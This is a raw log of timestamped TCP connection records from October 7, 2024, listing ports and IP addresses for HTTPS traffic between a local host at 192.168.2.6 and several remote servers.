Oct 7, 2024 18:47:22.924843073 CEST	49708	443	192.168.2.6	104.102.49.254
Oct 7, 2024 18:47:22.924880028 CEST	443	49708	104.102.49.254	192.168.2.6
Oct 7, 2024 18:47:22.925044060 CEST	49708	443	192.168.2.6	104.102.49.254
Oct 7, 2024 18:47:22.928519011 CEST	49708	443	192.168.2.6	104.102.49.254
Oct 7, 2024 18:47:22.928544998 CEST	443	49708	104.102.49.254	192.168.2.6
Oct 7, 2024 18:47:23.593689919 CEST	443	49708	104.102.49.254	192.168.2.6
Oct 7, 2024 18:47:23.593781948 CEST	49708	443	192.168.2.6	104.102.49.254
Oct 7, 2024 18:47:23.596971989 CEST	49708	443	192.168.2.6	104.102.49.254
Oct 7, 2024 18:47:23.597002029 CEST	443	49708	104.102.49.254	192.168.2.6
Oct 7, 2024 18:47:23.597462893 CEST	443	49708	104.102.49.254	192.168.2.6
Oct 7, 2024 18:47:23.639913082 CEST	49708	443	192.168.2.6	104.102.49.254
Oct 7, 2024 18:47:23.649470091 CEST	49708	443	192.168.2.6	104.102.49.254
Oct 7, 2024 18:47:23.695400000 CEST	443	49708	104.102.49.254	192.168.2.6
Oct 7, 2024 18:47:24.061783075 CEST	443	49708	104.102.49.254	192.168.2.6
Oct 7, 2024 18:47:24.061845064 CEST	443	49708	104.102.49.254	192.168.2.6
Oct 7, 2024 18:47:24.061875105 CEST	49708	443	192.168.2.6	104.102.49.254
Oct 7, 2024 18:47:24.061887026 CEST	443	49708	104.102.49.254	192.168.2.6
Oct 7, 2024 18:47:24.061907053 CEST	443	49708	104.102.49.254	192.168.2.6
Oct 7, 2024 18:47:24.061934948 CEST	49708	443	192.168.2.6	104.102.49.254
Oct 7, 2024 18:47:24.061942101 CEST	443	49708	104.102.49.254	192.168.2.6
Oct 7, 2024 18:47:24.061948061 CEST	443	49708	104.102.49.254	192.168.2.6
Oct 7, 2024 18:47:24.061961889 CEST	49708	443	192.168.2.6	104.102.49.254
Oct 7, 2024 18:47:24.062033892 CEST	49708	443	192.168.2.6	104.102.49.254
Oct 7, 2024 18:47:24.164235115 CEST	443	49708	104.102.49.254	192.168.2.6
Oct 7, 2024 18:47:24.164299011 CEST	443	49708	104.102.49.254	192.168.2.6
Oct 7, 2024 18:47:24.164431095 CEST	49708	443	192.168.2.6	104.102.49.254
Oct 7, 2024 18:47:24.164442062 CEST	443	49708	104.102.49.254	192.168.2.6
Oct 7, 2024 18:47:24.164558887 CEST	49708	443	192.168.2.6	104.102.49.254
Oct 7, 2024 18:47:24.181101084 CEST	443	49708	104.102.49.254	192.168.2.6
Oct 7, 2024 18:47:24.181334972 CEST	443	49708	104.102.49.254	192.168.2.6
Oct 7, 2024 18:47:24.181365013 CEST	49708	443	192.168.2.6	104.102.49.254
Oct 7, 2024 18:47:24.181390047 CEST	49708	443	192.168.2.6	104.102.49.254
Oct 7, 2024 18:47:24.199357033 CEST	49708	443	192.168.2.6	104.102.49.254
Oct 7, 2024 18:47:24.199357033 CEST	49708	443	192.168.2.6	104.102.49.254
Oct 7, 2024 18:47:24.199371099 CEST	443	49708	104.102.49.254	192.168.2.6
Oct 7, 2024 18:47:24.199378967 CEST	443	49708	104.102.49.254	192.168.2.6
Oct 7, 2024 18:47:24.336642027 CEST	49710	443	192.168.2.6	104.21.53.8
Oct 7, 2024 18:47:24.336688042 CEST	443	49710	104.21.53.8	192.168.2.6
Oct 7, 2024 18:47:24.336782932 CEST	49710	443	192.168.2.6	104.21.53.8
Oct 7, 2024 18:47:24.337115049 CEST	49710	443	192.168.2.6	104.21.53.8
Oct 7, 2024 18:47:24.337126017 CEST	443	49710	104.21.53.8	192.168.2.6
Oct 7, 2024 18:47:25.112728119 CEST	443	49710	104.21.53.8	192.168.2.6
Oct 7, 2024 18:47:25.112801075 CEST	49710	443	192.168.2.6	104.21.53.8
Oct 7, 2024 18:47:25.114418983 CEST	49710	443	192.168.2.6	104.21.53.8
Oct 7, 2024 18:47:25.114425898 CEST	443	49710	104.21.53.8	192.168.2.6
Oct 7, 2024 18:47:25.114841938 CEST	443	49710	104.21.53.8	192.168.2.6
Oct 7, 2024 18:47:25.116115093 CEST	49710	443	192.168.2.6	104.21.53.8
Oct 7, 2024 18:47:25.116136074 CEST	49710	443	192.168.2.6	104.21.53.8
Oct 7, 2024 18:47:25.116195917 CEST	443	49710	104.21.53.8	192.168.2.6
Oct 7, 2024 18:47:25.590089083 CEST	443	49710	104.21.53.8	192.168.2.6
Oct 7, 2024 18:47:25.590193987 CEST	443	49710	104.21.53.8	192.168.2.6
Oct 7, 2024 18:47:25.590246916 CEST	49710	443	192.168.2.6	104.21.53.8
Oct 7, 2024 18:47:25.591011047 CEST	49710	443	192.168.2.6	104.21.53.8
Oct 7, 2024 18:47:25.591026068 CEST	443	49710	104.21.53.8	192.168.2.6
Oct 7, 2024 18:47:25.591037035 CEST	49710	443	192.168.2.6	104.21.53.8
Oct 7, 2024 18:47:25.591042042 CEST	443	49710	104.21.53.8	192.168.2.6
Oct 7, 2024 18:47:29.061640024 CEST	49674	443	192.168.2.6	173.222.162.64
Oct 7, 2024 18:47:29.061640024 CEST	49673	443	192.168.2.6	173.222.162.64
Oct 7, 2024 18:47:29.387610912 CEST	49672	443	192.168.2.6	173.222.162.64
Oct 7, 2024 18:47:31.061871052 CEST	443	49703	173.222.162.64	192.168.2.6
Oct 7, 2024 18:47:31.061994076 CEST	49703	443	192.168.2.6	173.222.162.64
Oct 7, 2024 18:47:31.559286118 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:31.559421062 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:31.559508085 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:31.559729099 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:31.559752941 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.219098091 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.219187975 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.220568895 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.220590115 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.220860004 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.228297949 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.275405884 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.339318037 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.339404106 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.339481115 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.339555979 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.339617014 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.339649916 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.339689016 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.420830011 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.420896053 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.420978069 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.421058893 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.421094894 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.421118975 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.425357103 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.425410032 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.425436020 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.425452948 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.425482988 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.425699949 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.505688906 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.505774021 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.505861998 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.505904913 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.505934000 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.505953074 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.506755114 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.506803036 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.506829023 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.506841898 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.506871939 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.508127928 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.508181095 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.508202076 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.508219957 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.508249044 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.508270979 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.511925936 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.511971951 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.512008905 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.512028933 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.512056112 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.512073994 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.592477083 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.592519999 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.592642069 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.592679024 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.592926025 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.592994928 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.593025923 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.593064070 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.593076944 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.593106985 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.593125105 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.593718052 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.593746901 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.593789101 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.593801975 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.593833923 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.594613075 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.594639063 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.594680071 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.594693899 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.594722986 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.595213890 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.595232964 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.595278978 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.595293999 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.595321894 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.595808029 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.595833063 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.595880032 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.595894098 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.595920086 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.597709894 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.598515987 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.598599911 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.598612070 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.598639011 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.598663092 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.598687887 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.630388975 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.635931969 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.635971069 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.636014938 CEST	49715	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.636023998 CEST	443	49715	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.899611950 CEST	49716	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.899736881 CEST	443	49716	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.899856091 CEST	49716	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.900731087 CEST	49717	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.900777102 CEST	443	49717	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.900835037 CEST	49717	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.901516914 CEST	49718	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.901535034 CEST	443	49718	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.901647091 CEST	49718	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.902276993 CEST	49719	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.902302027 CEST	443	49719	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.902368069 CEST	49719	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.903373003 CEST	49720	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.903408051 CEST	443	49720	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.903527975 CEST	49720	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.903816938 CEST	49720	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.903830051 CEST	443	49720	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.914582014 CEST	49717	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.914602995 CEST	443	49717	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.914791107 CEST	49718	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.914807081 CEST	443	49718	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.914935112 CEST	49716	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.914988041 CEST	443	49716	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:32.915537119 CEST	49719	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:32.915571928 CEST	443	49719	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:33.890978098 CEST	443	49716	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:33.891731977 CEST	49716	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:33.891801119 CEST	443	49716	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:33.892254114 CEST	49716	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:33.892270088 CEST	443	49716	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.021838903 CEST	443	49718	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.022119999 CEST	443	49717	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.022561073 CEST	49718	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.022561073 CEST	49717	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.022577047 CEST	443	49718	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.022587061 CEST	443	49717	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.022969007 CEST	49718	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.022973061 CEST	443	49718	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.023046017 CEST	49717	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.023051023 CEST	443	49717	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.028004885 CEST	443	49720	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.028290987 CEST	49720	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.028315067 CEST	443	49720	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.028590918 CEST	49720	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.028595924 CEST	443	49720	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.048460960 CEST	443	49716	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.048523903 CEST	443	49716	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.048609972 CEST	49716	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.048671007 CEST	443	49716	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.048729897 CEST	49716	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.048823118 CEST	49716	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.048842907 CEST	443	49716	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.048871994 CEST	49716	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.048952103 CEST	443	49716	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.049053907 CEST	443	49716	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.049103022 CEST	49716	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.051409006 CEST	49721	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.051444054 CEST	443	49721	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.051680088 CEST	49721	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.051680088 CEST	49721	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.051711082 CEST	443	49721	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.053589106 CEST	443	49719	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.053906918 CEST	49719	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.053931952 CEST	443	49719	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.054291964 CEST	49719	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.054306984 CEST	443	49719	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.140444994 CEST	443	49718	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.140467882 CEST	443	49718	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.140748978 CEST	49718	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.140759945 CEST	443	49718	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.140878916 CEST	49718	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.140878916 CEST	49718	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.140892982 CEST	443	49718	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.141061068 CEST	443	49718	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.141093969 CEST	443	49718	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.141140938 CEST	49718	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.142393112 CEST	443	49717	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.142421007 CEST	443	49717	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.142527103 CEST	49717	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.142535925 CEST	443	49717	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.142576933 CEST	49717	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.142647028 CEST	443	49717	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.142661095 CEST	49717	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.142661095 CEST	49717	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.142667055 CEST	443	49717	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.142712116 CEST	443	49717	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.143623114 CEST	49722	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.143670082 CEST	443	49722	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.143749952 CEST	49722	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.143902063 CEST	49722	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.143919945 CEST	443	49722	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.144716024 CEST	49723	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.144757986 CEST	443	49723	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.144829988 CEST	49723	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.144979000 CEST	49723	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.144987106 CEST	443	49723	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.156805992 CEST	443	49720	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.156961918 CEST	443	49720	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.157027960 CEST	49720	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.158222914 CEST	49720	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.158231020 CEST	443	49720	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.158241034 CEST	49720	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.158245087 CEST	443	49720	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.159992933 CEST	49724	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.160022020 CEST	443	49724	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.160084963 CEST	49724	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.160178900 CEST	49724	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.160191059 CEST	443	49724	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.209201097 CEST	443	49719	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.209398985 CEST	443	49719	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.209517002 CEST	49719	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.210542917 CEST	49719	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.210587025 CEST	443	49719	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.210622072 CEST	49719	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.210639000 CEST	443	49719	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.213769913 CEST	49725	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.213814020 CEST	443	49725	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.213885069 CEST	49725	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.214073896 CEST	49725	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.214093924 CEST	443	49725	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.749747038 CEST	443	49721	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.754101992 CEST	49721	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.754133940 CEST	443	49721	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.754594088 CEST	49721	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.754601002 CEST	443	49721	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.770185947 CEST	443	49723	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.774048090 CEST	49723	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.774074078 CEST	443	49723	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.774408102 CEST	49723	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.774411917 CEST	443	49723	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.786156893 CEST	443	49722	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.790025949 CEST	49722	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.790067911 CEST	443	49722	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.790404081 CEST	49722	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.790410995 CEST	443	49722	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.860759020 CEST	443	49721	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.860922098 CEST	443	49721	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.860980988 CEST	49721	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.861109972 CEST	49721	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.861135960 CEST	443	49721	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.861148119 CEST	49721	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.861155987 CEST	443	49721	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.861887932 CEST	443	49725	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.862333059 CEST	49725	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.862401009 CEST	443	49725	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.862813950 CEST	49725	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.862828970 CEST	443	49725	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.863826036 CEST	49726	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.863893032 CEST	443	49726	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.864001036 CEST	49726	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.864142895 CEST	49726	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.864164114 CEST	443	49726	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.867022038 CEST	443	49724	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.870054007 CEST	49724	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.870079994 CEST	443	49724	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.870485067 CEST	49724	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.870490074 CEST	443	49724	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.885562897 CEST	443	49723	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.885679007 CEST	443	49723	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.885734081 CEST	49723	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.886327028 CEST	49723	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.886353016 CEST	443	49723	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.886368036 CEST	49723	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.886373997 CEST	443	49723	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.888988018 CEST	49727	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.889038086 CEST	443	49727	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.889183044 CEST	49727	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.890233040 CEST	49727	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.890253067 CEST	443	49727	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.894521952 CEST	443	49722	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.894620895 CEST	443	49722	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.894681931 CEST	49722	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.894882917 CEST	49722	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.894906044 CEST	443	49722	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.894922018 CEST	49722	443	192.168.2.6	13.107.253.72
